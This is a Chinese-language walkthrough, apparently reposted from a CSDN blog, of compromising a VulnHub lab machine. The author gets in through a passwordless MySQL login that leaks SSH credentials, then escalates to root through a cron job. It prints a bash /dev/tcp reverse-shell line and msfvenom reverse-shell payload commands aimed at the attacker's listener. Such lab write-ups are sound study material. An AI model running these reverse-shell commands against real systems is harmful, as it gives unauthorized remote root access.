标签:端口扫描 01 133.149 -- 192.168 7777 提权 vulnhub MySQL
目录
信息收集
主机发现
端口扫描
80 http服务;22 ssh;3306 MySQL。
目录扫描
就一个info.php
漏洞发现及利用
访问80端口:
访问info.php:
给出了phpinfo信息。但是没有什么可以利用的点。
web端其实没什么东西。
访问3306端口,连接MySQL:
直接弱口令(其实没有密码,直接进来。。。。。。)
正常操作,获得账号信息:
获得ssh账号密码。
进行连接:
提权
使用sudo查看suid权限的命令:
使用find命令,查看suid权限:
这个环境用不了wget,下载不了一些提权脚本:
查看定时任务:
/etc/crontab
每3分钟以root身份执行脚本。
在脚本中写入反弹shell的命令,以root身份反弹shell:
bash -i >& /dev/tcp/192.168.133.149/7777 0>&1
kali进行监听:
提权成功。
或者使用msfvenon:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.133.149 LPORT=7777
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.133.149 LPORT=7777
总结
web端没有什么利用点,mysql没有密码。。确实没想到。
主要也就是了解了定时任务。
标签:端口扫描,01,133.149,--,192.168,7777,提权,vulnhub,MySQL 来源: https://blog.csdn.net/qq_45742511/article/details/115145065
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。